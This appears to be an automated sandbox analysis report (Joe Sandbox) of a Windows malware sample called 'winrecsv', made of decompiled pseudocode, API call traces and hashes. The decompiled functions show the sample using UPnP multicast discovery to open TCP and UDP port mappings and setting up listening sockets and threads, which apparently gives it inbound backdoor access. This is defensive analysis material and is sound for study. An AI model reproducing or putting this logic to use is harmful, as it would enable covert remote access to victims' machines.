                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12);
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}
                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
                                                                                    • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                    • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
                                                                                    • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                    • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                    • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                    • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                    • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                  • String ID: TCP$UDP
                                                                                  • API String ID: 1519345861-1097902612
                                                                                  • Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
                                                                                  • Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 45%
                                                                                  			E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350; // executed
                                                                                  					GetSystemInfo( &_v36); // executed
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1); // executed
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1); // executed
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					__imp__#2(_t40,  &_v100, 0x10); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8); // executed
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0); // executed
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0); // executed
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}
                                                                                  0x00000000
                                                                                  0x0040efda
                                                                                  0x0040efdf
                                                                                  0x0040efe1
                                                                                  0x0040eff1
                                                                                  0x0040eff6
                                                                                  0x0040eff7
                                                                                  0x0040effa
                                                                                  0x0040efe1
                                                                                  0x0040f00f
                                                                                  0x0040f01e
                                                                                  0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNELBASE(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNELBASE ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: f44bf53eb25655aab0bab15c203cf931556eefbb9b0229b48a9fa46040447938
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: f44bf53eb25655aab0bab15c203cf931556eefbb9b0229b48a9fa46040447938
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 241 40c930-40c957 socket 242 40ca91-40ca95 241->242 243 40c95d-40ca25 htons inet_addr setsockopt call 409880 bind lstrlenA sendto ioctlsocket 241->243 244 40ca97-40ca9d 242->244 245 40ca9f-40caa5 242->245 248 40ca2b-40ca32 243->248 244->245 249 40ca34-40ca43 call 40c840 248->249 250 40ca85-40ca89 call 409940 248->250 254 40ca48-40ca50 249->254 253 40ca8e 250->253 253->242 255 40ca52 254->255 256 40ca54-40ca83 call 408ea0 254->256 255->250 256->248
                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNELBASE(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: bd73957c977b1b1f2f32df8065f8ec9b89bc96f57fbdf92598bbd54f766f39e3
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: bd73957c977b1b1f2f32df8065f8ec9b89bc96f57fbdf92598bbd54f766f39e3
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t26;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30); // executed
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1); // executed
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10); // executed
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                  						_t26 = CreateThread(0, 0, E0040DE70, _t31, 0, 0); // executed
                                                                                  						 *(_t31 + 0x14) = _t26;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}
                                                                                  0x0040dc40
                                                                                  0x0040dc40
                                                                                  0x0040dc48
                                                                                  0x0040dd34
                                                                                  0x0040dc56
                                                                                  0x0040dc65
                                                                                  0x0040dc6b
                                                                                  0x0040dc71
                                                                                  0x0040dc78
                                                                                  0x0040dc84
                                                                                  0x0040dc87
                                                                                  0x0040dc8d
                                                                                  0x0040dc93
                                                                                  0x0040dc95
                                                                                  0x0040dc9a
                                                                                  0x0040dc9a
                                                                                  0x0040dc9e
                                                                                  0x0040dd2e
                                                                                  0x00000000
                                                                                  0x0040dd30
                                                                                  0x0040dca6
                                                                                  0x0040dcaa
                                                                                  0x0040dcae
                                                                                  0x0040dcb2
                                                                                  0x0040dcb7
                                                                                  0x0040dcc1
                                                                                  0x0040dcc5
                                                                                  0x0040dcca
                                                                                  0x0040dcd9
                                                                                  0x0040dcde
                                                                                  0x0040dce3
                                                                                  0x0040dcec
                                                                                  0x0040dcfd
                                                                                  0x0040dd06
                                                                                  0x0040dd22
                                                                                  0x0040dd25
                                                                                  0x0040dd2b
                                                                                  0x00000000
                                                                                  0x0040dd2b
                                                                                  0x0040dd08
                                                                                  0x0040dd13
                                                                                  0x0040dd13

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNELBASE ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: 21a6eac36ac45e0ce4c2421bfe1f9b8c88aea41d39b788b7dca26a6014cc2608
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: 21a6eac36ac45e0ce4c2421bfe1f9b8c88aea41d39b788b7dca26a6014cc2608
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com"); // executed
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0); // executed
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10); // executed
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48); // executed
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28); // executed
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 160b4609061a34cf3d7366ed0b3d6bdc7a70b5745eb5cdbf8b3e4623f1c0186a
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 160b4609061a34cf3d7366ed0b3d6bdc7a70b5745eb5cdbf8b3e4623f1c0186a
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t20;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11); // executed
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10); // executed
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						_t20 = CreateThread(0, 0, E0040DE70, _t24, 0, 0); // executed
                                                                                  						 *(_t24 + 0x14) = _t20;
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNELBASE ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
